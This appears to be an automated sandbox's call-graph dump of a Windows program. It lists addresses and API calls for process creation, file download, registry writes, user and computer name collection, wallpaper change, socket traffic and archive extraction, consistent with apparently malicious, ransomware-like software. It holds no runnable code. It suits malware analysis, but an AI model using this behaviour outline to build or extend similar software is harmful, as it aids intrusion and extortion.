6338->6340 6339->6323 6339->6328 6341 405529 #6778 #6648 6339->6341 6340->6323 6341->6323 6341->6341 6342 40d630 6347 40d650 6342->6347 6344 40d638 6345 40d648 6344->6345 6346 40d63f #825 6344->6346 6346->6345 6348 40dad0 4 API calls 6347->6348 6349 40d680 6348->6349 6349->6344 6148 402531 6149 402543 6148->6149 6150 40253c CloseHandle 6148->6150 6151 402555 6149->6151 6152 40254e CloseHandle 6149->6152 6150->6149 6152->6151 6350 40ca3a 6353 40ca40 6350->6353 6351 40ca81 6352 40ca87 #825 6352->6351 6353->6351 6353->6352 5923 4068c0 #4837 6354 4032c0 6 API calls 6355 403334 SendMessageA #3092 6354->6355 6357 40335c SendMessageA #3092 6355->6357 6359 40337b SendMessageA #3092 6357->6359 6361 4033a0 SendMessageA 6359->6361 6362 40339d 6359->6362 6365 403cb0 FindFirstFileA 6361->6365 6362->6361 6364 4033b2 SendMessageA #3996 SendMessageA 6366 403cd9 6365->6366 6367 403ce3 6365->6367 6366->6364 6368 403e1f FindNextFileA 6367->6368 6370 403d14 sscanf 6367->6370 6368->6367 6369 403e3a FindClose 6368->6369 6369->6364 6370->6368 6371 403d38 fopen 6370->6371 6371->6368 6372 403d5c fread 6371->6372 6373 403e15 fclose 6372->6373 6377 403d7b 6372->6377 6373->6368 6374 403d8f sprintf 6375 403dd4 SendMessageA #823 SendMessageA 6374->6375 6375->6373 6377->6373 6377->6374 6377->6375 6378 401c30 inet_ntoa 6377->6378 6378->6377 6563 4043c0 #6453 #2414 6564 409fc0 TextOutA 5924 404cd0 5929 404cf0 #2414 #2414 #800 #641 5924->5929 5926 404cd8 5927 404ce8 5926->5927 5928 404cdf #825 5926->5928 5928->5927 5929->5926 4642 4064d0 #4710 SendMessageA SendMessageA 4686 401c70 wcscat 4642->4686 4644 406516 4645 406577 4644->4645 4646 40651d GetModuleFileNameA strrchr 4644->4646 4695 401a10 4645->4695 4647 40656c SetCurrentDirectoryA 4646->4647 4648 40655d strrchr 4646->4648 4647->4645 4648->4647 4650 406585 4651 4065e5 4650->4651 4652 40658c time 4650->4652 4705 402c40 4651->4705 4653 401a10 5 API calls 4652->4653 4653->4651 4655 4065ed __p___argc 4656 406606 4655->4656 4657 40678c 4656->4657 
4658 40660f __p___argv 4656->4658 4753 407e80 SHGetFolderPathW wcslen 4657->4753 4660 406621 4658->4660 4663 406661 __p___argv 4660->4663 4664 406652 4660->4664 4661 406793 SetWindowTextW 4756 406f80 4661->4756 4667 40666d 4663->4667 4724 407f80 fopen 4664->4724 4665 4067a9 4814 406c20 GetUserDefaultLangID GetLocaleInfoA 4665->4814 4671 4066ad __p___argv 4667->4671 4672 40669e 4667->4672 4670 4067b0 SetTimer SetTimer 4674 4066b9 4671->4674 4734 4080c0 FindFirstFileA 4672->4734 4674->4657 4676 4066ee Sleep 4674->4676 4711 401bb0 AllocateAndInitializeSid 4676->4711 4678 406734 4679 406750 sprintf 4678->4679 4680 406738 4678->4680 4716 401a90 CreateProcessA 4679->4716 4752 401b50 ShellExecuteExA 4680->4752 4683 40674b 4685 406784 ExitProcess 4683->4685 4684 406781 4684->4685 4688 401cdc 4686->4688 4687 401d00 RegCreateKeyW 4687->4688 4688->4687 4689 401d62 RegQueryValueExA 4688->4689 4690 401d1d GetCurrentDirectoryA RegSetValueExA 4688->4690 4691 401dbb 4688->4691 4692 401d9e RegCloseKey 4689->4692 4693 401d90 SetCurrentDirectoryA 4689->4693 4690->4692 4691->4644 4692->4688 4694 401dc8 4692->4694 4693->4692 4694->4644 4696 401a1a fopen 4695->4696 4698 401a3a 4696->4698 4699 401a6f 4696->4699 4700 401a53 fwrite 4698->4700 4701 401a46 fread 4698->4701 4699->4650 4702 401a5e 4700->4702 4701->4702 4703 401a74 fclose 4702->4703 4704 401a66 fclose 4702->4704 4703->4650 4704->4699 4823 404b70 4705->4823 4707 402c46 4708 402c57 4707->4708 4709 402c5e LoadLibraryA 4707->4709 4708->4655 4709->4708 4710 402c73 7 API calls 4709->4710 4710->4708 4712 401bf6 4711->4712 4713 401bfb CheckTokenMembership 4711->4713 4712->4678 4714 401c10 4713->4714 4715 401c14 FreeSid 4713->4715 4714->4715 4715->4678 4717 401b45 4716->4717 4718 401aed 4716->4718 4717->4684 4719 401af5 WaitForSingleObject 4718->4719 4720 401b26 CloseHandle CloseHandle 4718->4720 4721 401b12 4719->4721 4722 401b05 TerminateProcess 4719->4722 4720->4684 4721->4720 4723 401b1a GetExitCodeProcess 4721->4723 4722->4721 
4723->4720 4725 407fd0 fread fclose 4724->4725 4733 406659 ExitProcess 4724->4733 4828 40be90 strncpy strncpy strncpy 4725->4828 4727 408002 4829 40c4f0 4727->4829 4729 40801d 4730 40c4f0 112 API calls 4729->4730 4731 408041 4729->4731 4730->4731 4732 401a10 5 API calls 4731->4732 4731->4733 4732->4733 4735 40820a 4734->4735 4747 408124 4734->4747 5288 401e30 4735->5288 4738 4081e4 FindNextFileA 4739 4081ff FindClose 4738->4739 4738->4747 4739->4735 4740 401e30 2 API calls 4742 408255 sprintf #537 4740->4742 4741 408158 sscanf 4741->4738 4743 408178 fopen 4741->4743 5293 4082c0 4742->5293 4743->4738 4745 408190 fread 4743->4745 4745->4747 4748 4081bd fclose 4745->4748 4747->4738 4747->4741 4747->4748 4748->4738 4748->4747 4749 408291 #537 4751 4082c0 141 API calls 4749->4751 4750 4066a5 ExitProcess 4751->4750 4752->4683 4754 407f02 4753->4754 4755 407f09 swprintf MultiByteToWideChar CopyFileW SystemParametersInfoW 4753->4755 4754->4661 4755->4661 5350 4076a0 4756->5350 4758 406fa8 27 API calls 4759 407119 4758->4759 4760 40711c SendMessageA #3092 4758->4760 4759->4760 4761 40713d SendMessageA #3092 4760->4761 4763 40715f SendMessageA #3092 4761->4763 4765 407181 SendMessageA #3092 4763->4765 4767 4071a3 SendMessageA #3092 4765->4767 4769 4071c5 SendMessageA #3092 4767->4769 4771 4071e7 4769->4771 4772 4071ea SendMessageA #3092 4769->4772 4771->4772 4773 407205 SendMessageA #3092 4772->4773 4775 407227 SendMessageA #3092 4773->4775 4777 407249 SendMessageA #3092 4775->4777 4779 40726b 4777->4779 4780 40726e SendMessageA #860 4777->4780 4779->4780 4781 4072a4 4780->4781 4782 4072ed #537 4781->4782 5366 404210 #858 #800 4782->5366 4784 407309 #537 5367 404210 #858 #800 4784->5367 4786 407325 #540 #2818 #535 5368 404210 #858 #800 4786->5368 4788 407369 5369 404270 4788->5369 4792 4073a8 SendMessageA SendMessageA #6140 #6140 4793 407428 4792->4793 5373 405920 4793->5373 4797 407457 5381 4058c0 4797->5381 4799 407460 5384 405180 _mbscmp 4799->5384 4801 407477 4802 405920 
2 API calls 4801->4802 4803 4074ac 4802->4803 4804 405860 2 API calls 4803->4804 4805 4074b5 4804->4805 4806 4058c0 2 API calls 4805->4806 4807 4074be 4806->4807 4808 405180 4 API calls 4807->4808 4809 4074d5 GetTimeZoneInformation 4808->4809 5390 401e60 VariantTimeToSystemTime 4809->5390 4811 407508 SystemTimeToTzSpecificLocalTime #2818 5391 401e60 VariantTimeToSystemTime 4811->5391 4813 40759b SystemTimeToTzSpecificLocalTime #2818 #6334 #800 4813->4665 4815 406c81 SendMessageA 4814->4815 4816 406c5d 4814->4816 4817 406cc1 SendMessageA 4815->4817 4818 406ca1 SendMessageA 4815->4818 4816->4815 4820 406ae0 27 API calls 4817->4820 5398 406ae0 8 API calls 4818->5398 4821 406cdd 4820->4821 4821->4670 4822 406cba 4822->4670 4824 404b81 LoadLibraryA 4823->4824 4825 404b7a 4823->4825 4826 404b96 6 API calls 4824->4826 4827 404bf6 4824->4827 4825->4707 4826->4827 4827->4707 4828->4727 4830 40c50f 4829->4830 4843 40bed0 4830->4843 4832 40c54b 4833 40c596 4832->4833 4862 40dd00 4832->4862 4865 40dbf0 4833->4865 4836 40c5e7 4836->4729 4837 40c568 4837->4833 4838 40c600 4837->4838 4839 40c635 4838->4839 4840 40c617 strncpy 4838->4840 4841 40dbf0 free 4839->4841 4840->4839 4842 40c650 4841->4842 4842->4729 4844 40bef5 4843->4844 4845 40bf0a #823 4843->4845 4844->4845 4846 40bf2e 4845->4846 4847 40bf27 4845->4847 4849 40bf46 4846->4849 4873 40baf0 4846->4873 4869 40d5e0 4847->4869 4849->4832 4852 40bf72 4852->4832 4853 40bf8a GetComputerNameA GetUserNameA 4905 40dc00 4853->4905 4856 40dd00 4 API calls 4857 40c01f 4856->4857 4858 40dc00 4 API calls 4857->4858 4859 40c038 4858->4859 4860 40dd00 4 API calls 4859->4860 4861 40c047 4860->4861 4861->4832 4863 40dc00 4 API calls 4862->4863 4864 40dd1c 4863->4864 4864->4837 4866 40dd70 4865->4866 4867 40dd8b 4866->4867 5284 412ac0 4866->5284 4867->4836 4870 40d602 4869->4870 4914 40dad0 4870->4914 4917 40ba10 4873->4917 4875 40bdf5 4875->4852 4875->4853 4876 40bb14 4876->4875 4877 40bb42 4876->4877 4922 40ba60 4876->4922 4877->4875 4926 
40c8f0 #823 4877->4926 4881 40bc1b strtok 4885 40bc30 4881->4885 4896 40bbb7 4881->4896 4882 40ba60 closesocket 4884 40bc8b 4882->4884 4886 40bc92 4884->4886 4887 40bcec GetTickCount srand 4884->4887 4885->4882 4885->4887 4948 40c860 4886->4948 4890 40bdc7 4887->4890 4891 40bd07 rand 4887->4891 4893 40c860 2 API calls 4890->4893 4901 40bd1e 4891->4901 4892 40bcd8 #825 4892->4875 4895 40bde8 #825 4893->4895 4895->4875 4896->4881 4898 40c7b0 #825 4896->4898 4928 40c7b0 4896->4928 4932 40c920 4896->4932 4944 40c800 #823 4896->4944 4897 40ba60 closesocket 4897->4901 4898->4881 4899 40be75 #825 4899->4875 4900 40be11 4900->4899 4960 40c740 4900->4960 4901->4897 4901->4900 4954 40ce50 4901->4954 4906 40dc15 4905->4906 4912 40c013 4905->4912 4907 40dc77 4906->4907 4908 40dc49 4906->4908 4906->4912 5283 412aa0 realloc 4907->5283 5282 412a90 malloc 4908->5282 4911 40dc51 4911->4912 4913 40dc8d ??0exception@@QAE@ABQBD _CxxThrowException 4911->4913 4912->4856 4913->4912 4915 40d61e 4914->4915 4916 40dadf setsockopt send shutdown closesocket 4914->4916 4915->4846 4916->4915 4918 40ba27 4917->4918 4919 40ba2b 4918->4919 4965 40b840 sprintf GetFileAttributesA 4918->4965 4919->4876 4921 40ba31 4921->4876 4923 40ba88 4922->4923 5218 40d8c0 4923->5218 4927 40bb62 strtok 4926->4927 4927->4885 4927->4896 4929 40c7d0 4928->4929 4930 40c7bb 4928->4930 4929->4896 4930->4929 4931 40c7d6 #825 4930->4931 4931->4929 4933 40c932 4932->4933 4934 40c92d ?_Xlen@std@ 4932->4934 4935 40c973 4933->4935 4936 40c963 4933->4936 4937 40c946 4933->4937 4934->4933 4940 40c990 4935->4940 4941 40c7b0 #825 4935->4941 4938 40c7b0 #825 4936->4938 4942 40c94a 4937->4942 5222 40c9c0 4937->5222 4939 40c96c 4938->4939 4939->4896 4940->4896 4941->4937 4942->4896 4945 40c81f 4944->4945 5228 40cad0 4945->5228 4947 40c844 4947->4896 4949 40c8d9 4948->4949 4951 40c870 4948->4951 4949->4892 4950 40c8ab #825 4950->4951 4953 40c8cc 4950->4953 4951->4950 4952 40c8a2 #825 4951->4952 4952->4950 4953->4892 4955 40ce68 
4954->4955 4956 40ce5a 4954->4956 4958 40ce94 #825 4955->4958 4959 40bd9e #825 Sleep 4955->4959 4956->4955 4957 40ce6e #825 4956->4957 4957->4955 4958->4959 4959->4890 4959->4891 4961 40c761 4960->4961 4962 40c77e #825 4960->4962 4963 40c775 #825 4961->4963 4964 40c76f 4961->4964 4962->4900 4963->4962 4964->4962 4966 40b898 4965->4966 4967 40b95b CreateProcessA 4965->4967 4982 40b6a0 CreateDirectoryA 4966->4982 4969 40b9b4 4967->4969 4970 40b9bf WaitForSingleObject 4967->4970 4969->4921 4971 40b9e4 CloseHandle CloseHandle 4970->4971 4972 40b9d8 WaitForSingleObject 4970->4972 4971->4921 4972->4971 4973 40b8a9 4974 40b8e9 sprintf GetFileAttributesA 4973->4974 4996 40b780 CreateDirectoryA 4973->4996 4976 40b946 CopyFileA 4974->4976 4977 40b93b 4974->4977 4976->4967 4977->4921 4978 40b8c1 4978->4974 4979 40b780 60 API calls 4978->4979 4980 40b8d9 4979->4980 4980->4974 4981 40b8e0 4980->4981 4981->4921 5004 412920 4982->5004 4985 40b6d8 DeleteFileA 4985->4973 4986 40b6ec 5007 412940 4986->5007 4988 40b70e 4989 40b719 4988->4989 4990 40b76a 4988->4990 4992 412940 14 API calls 4988->4992 4989->4973 5016 412a00 4990->5016 4994 40b738 sprintf 4992->4994 4993 40b770 4993->4973 5013 4129e0 4994->5013 4997 40b81b 4996->4997 4998 40b7ae GetTempFileNameA DeleteUrlCacheEntry URLDownloadToFileA 4996->4998 4997->4978 4999 40b810 DeleteFileA 4998->4999 5000 40b7f6 4998->5000 4999->4997 5001 40b6a0 54 API calls 5000->5001 5002 40b809 5001->5002 5002->4999 5003 40b827 DeleteFileA 5002->5003 5003->4978 5027 4127e0 #823 5004->5027 5006 40b6cf 5006->4985 5006->4986 5008 412964 5007->5008 5009 412959 5007->5009 5010 412969 5008->5010 5053 411cf0 5008->5053 5009->4988 5010->4988 5012 412982 5012->4988 5143 412990 5013->5143 5015 4129f8 5015->4988 5017 412a15 5016->5017 5018 412a09 5016->5018 5019 412a1a 5017->5019 5205 4127a0 5017->5205 5018->4993 5019->4993 5022 412a7d #825 5022->4993 5023 412a44 #825 5024 412a4d 5023->5024 5025 412a61 #825 5024->5025 5026 412a6a #825 5024->5026 
5025->5026 5026->5022 5028 412815 5027->5028 5029 41287a 5027->5029 5028->5029 5030 41283d #823 5028->5030 5040 411c00 5029->5040 5030->5029 5032 41289d 5033 4128a6 5032->5033 5034 4128f8 #823 5032->5034 5035 4128e5 5033->5035 5036 4128b4 #825 5033->5036 5037 4128bd 5033->5037 5034->5006 5035->5006 5036->5037 5038 4128d6 #825 5037->5038 5039 4128cd #825 5037->5039 5038->5035 5039->5038 5041 411c10 5040->5041 5042 411ce2 5040->5042 5041->5042 5043 411c1a GetCurrentDirectoryA 5041->5043 5042->5032 5044 411c45 5043->5044 5045 411c80 SetFilePointer 5044->5045 5046 411c9e 5044->5046 5045->5046 5047 411c92 5045->5047 5048 4108a0 CreateFileA SetFilePointer #823 SetFilePointer 5046->5048 5047->5032 5049 411caf 5048->5049 5050 411cb6 5049->5050 5051 410dc0 9 API calls 5049->5051 5050->5032 5052 411cc7 5051->5052 5052->5032 5054 412231 5053->5054 5055 411d11 5053->5055 5054->5012 5055->5054 5059 411d27 5055->5059 5086 411ac0 5055->5086 5057 411d37 5057->5012 5058 411dc2 5061 411ddc 5058->5061 5098 4113e0 5058->5098 5059->5057 5059->5058 5093 411390 5059->5093 5104 411350 5061->5104 5066 411e15 5067 411e1c 5066->5067 5131 410a50 5066->5131 5067->5012 5069 411e3e 5070 411e45 5069->5070 5071 411e56 #823 5069->5071 5070->5012 5138 410af0 5071->5138 5073 411e78 5074 411e83 #825 5073->5074 5075 411e9d _mbsstr 5073->5075 5074->5012 5077 411f15 _mbsstr 5075->5077 5077->5075 5078 411f2c _mbsstr 5077->5078 5078->5075 5079 411f43 _mbsstr 5078->5079 5079->5075 5080 411f5a 5079->5080 5142 411b80 SystemTimeToFileTime 5080->5142 5082 412063 LocalFileTimeToFileTime 5085 4120b6 5082->5085 5083 412203 5083->5012 5084 4121fa #825 5084->5083 5085->5083 5085->5084 5087 411acd 5086->5087 5089 411ad6 5086->5089 5087->5059 5088 411add 5088->5059 5089->5088 5090 411b02 free 5089->5090 5092 411b11 5089->5092 5090->5092 5091 411b2a free 5091->5059 5092->5091 5094 4113a0 5093->5094 5095 411399 5093->5095 5096 411000 SetFilePointer SetFilePointer ReadFile 5094->5096 5095->5058 5097 4113c7 5096->5097 
5097->5058 5099 4113f0 5098->5099 5100 4113e9 5098->5100 5101 4113f7 5099->5101 5102 411000 SetFilePointer SetFilePointer ReadFile 5099->5102 5100->5058 5101->5058 5103 411444 5102->5103 5103->5058 5105 411000 SetFilePointer SetFilePointer ReadFile 5104->5105 5106 41137f 5105->5106 5107 411460 5106->5107 5108 410a50 SetFilePointer SetFilePointer 5107->5108 5109 411491 5108->5109 5110 411498 5109->5110 5111 410c00 ReadFile 5109->5111 5110->5066 5112 4114af 5111->5112 5113 410bb0 ReadFile 5112->5113 5114 4114d7 5113->5114 5115 410bb0 ReadFile 5114->5115 5116 4114ee 5115->5116 5117 410bb0 ReadFile 5116->5117 5118 411505 5117->5118 5119 410c00 ReadFile 5118->5119 5120 41153b 5119->5120 5121 410c00 ReadFile 5120->5121 5122 411552 5121->5122 5123 410c00 ReadFile 5122->5123 5125 411586 5123->5125 5124 410c00 ReadFile 5126 4115ba 5124->5126 5125->5124 5127 410bb0 ReadFile 5126->5127 5129 4115ee 5127->5129 5128 410bb0 ReadFile 5130 411621 5128->5130 5129->5128 5130->5066 5132 410a5a 5131->5132 5135 410aaa 5131->5135 5133 410a82 5132->5133 5134 410a69 SetFilePointer 5132->5134 5132->5135 5136 410aa4 5133->5136 5137 410a90 SetFilePointer 5133->5137 5134->5069 5135->5069 5136->5069 5137->5069 5139 410b31 5138->5139 5140 410b07 ReadFile 5138->5140 5139->5073 5141 410b22 5140->5141 5141->5073 5142->5082 5144 4129a3 5143->5144 5145 412998 5143->5145 5146 4129a8 5144->5146 5149 412360 5144->5149 5145->5015 5146->5015 5148 4129cf 5148->5015 5150 412378 5149->5150 5151 41239c 5149->5151 5155 4124ab 5150->5155 5156 41238a 5150->5156 5161 411ac0 free free 5150->5161 5152 41240e 5151->5152 5153 4123b7 5151->5153 5158 411ac0 free free 5151->5158 5154 411810 SetFilePointer SetFilePointer ReadFile 5152->5154 5160 4123c8 5153->5160 5164 4123e5 5153->5164 5168 411390 SetFilePointer SetFilePointer ReadFile 5153->5168 5159 412431 5154->5159 5157 4124bf 5155->5157 5162 4124dc 5155->5162 5165 411390 SetFilePointer SetFilePointer ReadFile 5155->5165 5156->5148 5157->5148 5158->5153 5163 412442 
5159->5163 5166 411ac0 free free 5159->5166 5160->5148 5161->5155 5167 4124f6 5162->5167 5170 4113e0 SetFilePointer SetFilePointer ReadFile 5162->5170 5163->5148 5169 4123ff 5164->5169 5172 4113e0 SetFilePointer SetFilePointer ReadFile 5164->5172 5165->5162 5166->5163 5171 411cf0 14 API calls 5167->5171 5168->5164 5173 411660 8 API calls 5169->5173 5170->5162 5174 412506 5171->5174 5172->5164 5173->5152 5175 412578 5174->5175 5179 412510 5174->5179 5176 41257d 5175->5176 5180 4125da 5175->5180 5185 4125df wsprintfA 5175->5185 5187 412671 wsprintfA 5175->5187 5182 412637 5176->5182 5183 411660 8 API calls 5176->5183 5177 412515 5177->5148 5178 41253f 5181 412250 GetFileAttributesA CreateDirectoryA GetFileAttributesA CreateDirectoryA 5178->5181 5179->5177 5179->5178 5184 412559 5179->5184 5180->5185 5186 412547 5181->5186 5182->5148 5188 4126ad 5183->5188 5190 412250 GetFileAttributesA CreateDirectoryA GetFileAttributesA CreateDirectoryA 5184->5190 5189 412250 GetFileAttributesA CreateDirectoryA GetFileAttributesA CreateDirectoryA 5185->5189 5186->5148 5191 412250 GetFileAttributesA CreateDirectoryA GetFileAttributesA CreateDirectoryA 5187->5191 5192 4126ba #823 5188->5192 5201 4126cd 5188->5201 5193 41260a CreateFileA 5189->5193 5194 412566 5190->5194 5191->5193 5192->5201 5193->5176 5194->5148 5196 411810 SetFilePointer SetFilePointer ReadFile 5196->5201 5197 412728 5198 412776 5197->5198 5199 41276f CloseHandle 5197->5199 5202 411ac0 free free 5198->5202 5199->5198 5200 412704 WriteFile 5200->5197 5200->5201 5201->5196 5201->5197 5201->5200 5203 412746 SetFileTime 5201->5203 5204 41277e 5202->5204 5203->5197 5204->5148 5206 4127b1 5205->5206 5207 4127a9 5205->5207 5209 4127c7 5206->5209 5211 410f70 5206->5211 5208 411ac0 2 API calls 5207->5208 5208->5206 5209->5022 5209->5023 5209->5024 5212 410f80 5211->5212 5213 410f79 5211->5213 5214 410f8d 5212->5214 5215 411ac0 free free 5212->5215 5213->5209 5216 4109c0 CloseHandle #825 5214->5216 5215->5214 5217 410f98 free 
5216->5217 5217->5209 5220 40d8ec 5218->5220 5219 40daad closesocket 5221 40baa8 5219->5221 5220->5219 5220->5221 5221->4877 5223 40c9f6 #823 5222->5223 5227 40ca40 5223->5227 5225 40ca81 5225->4940 5226 40ca87 #825 5226->5225 5227->5225 5227->5226 5229 40cbf3 5228->5229 5230 40cb00 5228->5230 5229->4947 5231 40cb26 5230->5231 5237 40cb90 5230->5237 5232 40cb31 5231->5232 5233 40cb2c ?_Xran@std@ 5231->5233 5247 40cd80 5232->5247 5233->5232 5234 40cbe9 5236 40cc60 5 API calls 5234->5236 5236->5229 5237->5234 5239 40cbaa 5237->5239 5238 40cb38 5241 40cb6a 5238->5241 5242 40cb47 memmove 5238->5242 5240 40c7b0 #825 5239->5240 5243 40cbb3 5240->5243 5245 40cd80 4 API calls 5241->5245 5264 40cc60 5242->5264 5243->4947 5246 40cb7d 5245->5246 5246->4947 5248 40cd93 5247->5248 5249 40ce27 5247->5249 5248->5249 5250 40cdd0 5248->5250 5251 40cdc9 ?_Xlen@std@ 5248->5251 5249->5238 5252 40cdf8 5250->5252 5255 40cde2 5250->5255 5251->5250 5253 40ce0a 5252->5253 5254 40cdfc 5252->5254 5253->5249 5260 40c7b0 #825 5253->5260 5256 40c7b0 #825 5254->5256 5257 40cde6 5255->5257 5258 40ce1f 5255->5258 5259 40ce05 5256->5259 5261 40c7b0 #825 5257->5261 5262 40c9c0 2 API calls 5258->5262 5259->5238 5260->5258 5263 40cdf3 5261->5263 5262->5249 5263->5238 5265 40cc73 5264->5265 5266 40cc6e ?_Xlen@std@ 5264->5266 5267 40cd04 5265->5267 5268 40cc88 5265->5268 5269 40ccae 5265->5269 5266->5265 5267->5268 5274 40cd08 5267->5274 5270 40cc90 5268->5270 5273 40c9c0 2 API calls 5268->5273 5272 40ccd9 #825 5269->5272 5276 40ccc4 5269->5276 5270->5241 5271 40cd4c 5277 40c9c0 2 API calls 5271->5277 5272->5276 5273->5270 5274->5270 5274->5271 5275 40cd43 #825 5274->5275 5278 40cd26 5274->5278 5275->5271 5276->5241 5279 40cd5d 5277->5279 5280 40c9c0 2 API calls 5278->5280 5279->5241 5281 40cd3b 5280->5281 5281->5241 5282->4911 5283->4911 5285 412af5 5284->5285 5286 412ac8 free 5284->5286 5285->4867 5286->5285 5320 401e60 VariantTimeToSystemTime 5288->5320 5290 401e42 5321 401de0 sprintf 5290->5321 5292 
401e51 5292->4740 5294 408337 5293->5294 5295 4082fb #4278 #858 #800 5293->5295 5296 408344 5294->5296 5297 408378 time 5294->5297 5295->5294 5298 408359 #800 5296->5298 5299 40834d #1200 5296->5299 5300 40839c 5297->5300 5301 40844d time 5297->5301 5302 40828c 5298->5302 5299->5298 5300->5301 5303 4083a9 5300->5303 5301->5303 5304 408466 5301->5304 5302->4749 5302->4750 5305 4083bb 5303->5305 5306 40846c fopen 5303->5306 5304->5306 5307 4083c4 #540 time #2818 #1200 #800 5305->5307 5308 40842e #800 5305->5308 5309 4084b5 fread fclose 5306->5309 5310 408496 #800 5306->5310 5307->5308 5308->5302 5322 40be90 strncpy strncpy strncpy 5309->5322 5310->5302 5312 4084e7 5323 40c060 5312->5323 5314 408501 5315 408516 5314->5315 5316 408538 5314->5316 5317 408549 #800 5315->5317 5318 40851a #1200 time 5315->5318 5316->5317 5319 40853c #1200 5316->5319 5317->5302 5318->5317 5319->5317 5320->5290 5321->5292 5322->5312 5324 40c07f 5323->5324 5325 40bed0 110 API calls 5324->5325 5326 40c0ba 5325->5326 5327 40c0c1 5326->5327 5328 40c0e7 5326->5328 5329 40c0cc SendMessageA 5327->5329 5347 40c0db 5327->5347 5330 40c104 5328->5330 5331 40c0f8 SendMessageA 5328->5331 5329->5347 5332 40dd00 4 API calls 5330->5332 5331->5330 5335 40c116 5332->5335 5333 40dbf0 free 5334 40c173 5333->5334 5334->5314 5336 40c144 5335->5336 5337 40c17b 5335->5337 5338 40c154 5336->5338 5339 40c148 SendMessageA 5336->5339 5340 40c18b 5337->5340 5341 40c17f SendMessageA 5337->5341 5342 40dbf0 free 5338->5342 5339->5338 5343 40c1b4 5340->5343 5344 40c1e8 5340->5344 5341->5340 5342->5334 5345 40c1c4 5343->5345 5346 40c1b8 SendMessageA 5343->5346 5344->5347 5348 40c1f5 SendMessageA 5344->5348 5349 40dbf0 free 5345->5349 5346->5345 5347->5333 5348->5347 5349->5334 5351 4076d9 time 5350->5351 5352 4076d7 5351->5352 5352->5351 5353 407771 sprintf 5352->5353 5354 405180 4 API calls 5352->5354 5355 407842 SendMessageA SendMessageA #540 5352->5355 5353->5352 5354->5352 5356 407894 5355->5356 5357 4078aa _ftol #2818 
#2818 5356->5357 5358 4078db #2818 #2818 5356->5358 5359 407911 #3092 #6199 5357->5359 5358->5359 5360 407990 #800 5359->5360 5361 407940 5359->5361 5360->4758 5361->5360 5362 407952 InvalidateRect 5361->5362 5363 405920 2 API calls 5362->5363 5364 407978 5363->5364 5365 405920 2 API calls 5364->5365 5365->5360 5366->4784 5367->4786 5368->4788 5392 4044c0 5369->5392 5372 404210 #858 #800 5372->4792 5396 405950 InvalidateRect 5373->5396 5375 40592d 5397 405970 InvalidateRect 5375->5397 5377 40593e 5378 405860 5377->5378 5379 405872 5378->5379 5380 405875 GetClientRect #6197 5378->5380 5379->5380 5380->4797 5382 4058d2 5381->5382 5383 4058d5 GetClientRect #6197 5381->5383 5382->5383 5383->4799 5385 4051f8 5384->5385 5386 40519e #860 5384->5386 5385->4801 5387 4051b1 5386->5387 5388 4051d1 RedrawWindow 5387->5388 5389 4051ea InvalidateRect 5387->5389 5388->4801 5389->5385 5390->4811 5391->4813 5393 4044f8 GetObjectA CreateFontIndirectA #1641 5392->5393 5394 4044ce GetParent #2864 SendMessageA #2860 5392->5394 5395 40427a #2818 #535 5393->5395 5394->5393 5394->5395 5395->5372 5396->5375 5397->5377 5399 406b88 #537 #924 sprintf #800 #800 5398->5399 5400 406bda 5398->5400 5399->5400 5403 406cf0 5400->5403 5402 406be6 #800 5402->4822 5404 406d16 5403->5404 5405 406d19 SendMessageA #353 SendMessageA #1979 5403->5405 5404->5405 5408 406dc0 SendMessageA #823 5405->5408 5409 406e00 SendMessageA 5408->5409 5410 406d7b #665 5408->5410 5412 406ed2 #825 5409->5412 5413 406e2f _strnicmp 5409->5413 5410->5402 5412->5410 5414 406e4b _strnicmp 5413->5414 5415 406e67 5413->5415 5414->5415 5415->5412 5415->5413 5416 406e87 SendMessageA #6136 5415->5416 5416->5415 6153 4019d0 EnableWindow 6154 4059d0 #561 6155 404dd0 6 API calls 6156 404e3b SendMessageA #3092 6155->6156 6158 404e60 SendMessageA #3092 6156->6158 6160 404e93 SendMessageA 6158->6160 6161 404e7f SendMessageA 6158->6161 6565 40dbd0 6566 40dbf0 free 6565->6566 6567 40dbd8 6566->6567 6568 40dbe8 6567->6568 6569 40dbdf #825 
6567->6569 6569->6568 6379 4102d0 free 5930 4130d4 ??1type_info@@UAE 5931 4130e3 #825 5930->5931 5932 4130ea 5930->5932 5931->5932 5934 4068e0 5935 4068ef 5934->5935 5936 40691a #5280 5935->5936 5937 4068fc 5935->5937 5529 4043e0 #4284 #3874 #5277 5933 40a0e0 Escape 6380 4086e0 #470 GetClientRect SendMessageA #6734 #323 6381 408765 6380->6381 6382 408838 6381->6382 6385 4087bd CreateCompatibleDC #1640 6381->6385 6383 408885 #2754 6382->6383 6384 408869 FillRect 6382->6384 6386 408897 #2381 6383->6386 6384->6386 6412 409e70 CreateCompatibleBitmap #1641 6385->6412 6389 4088b4 6386->6389 6390 408a7d 6386->6390 6389->6390 6392 4088be #3797 6389->6392 6394 409f80 BitBlt 6390->6394 6408 408a5e 6390->6408 6391 408809 6413 409f10 6391->6413 6395 408901 _ftol 6392->6395 6397 408abe 6394->6397 6402 40895e _ftol 6395->6402 6404 40897e 6395->6404 6396 408817 #6194 6396->6382 6399 408ad5 #5785 6397->6399 6400 408ac6 #5785 6397->6400 6399->6408 6400->6408 6402->6404 6403 408afe #640 #755 6405 4089a7 FillRect 6404->6405 6406 4089b8 FillRect 6404->6406 6407 4089ca 6404->6407 6405->6407 6406->6407 6407->6408 6416 409f80 6407->6416 6419 409e20 #2414 6408->6419 6410 408a50 6411 409f10 2 API calls 6410->6411 6411->6408 6412->6391 6414 409f25 #5785 6413->6414 6415 409f18 #5785 6413->6415 6414->6396 6415->6396 6417 409f88 6416->6417 6418 409f8b BitBlt 6416->6418 6417->6418 6418->6410 6419->6403 6420 40c6e0 6421 40c722 #825 6420->6421 6422 40c6ef 6420->6422 6423 40c7b0 #825 6422->6423 6424 40c70d #825 6423->6424 6424->6422 6425 40c721 6424->6425 6425->6421 6583 40cfe0 6590 40d4c0 6583->6590 6585 40cffb 6586 40d4c0 4 API calls 6585->6586 6589 40d05e 6585->6589 6587 40d031 6586->6587 6588 40d4c0 4 API calls 6587->6588 6587->6589 6588->6589 6591 40d4d0 6590->6591 6592 40d4d9 6590->6592 6591->6585 6593 40d4e4 6592->6593 6594 40d4ee time 6592->6594 6593->6585 6595 40d575 6594->6595 6598 40d50a 6594->6598 6596 40d58a 6595->6596 6597 40d2b0 memmove 6595->6597 6596->6585 6597->6596 6598->6595 
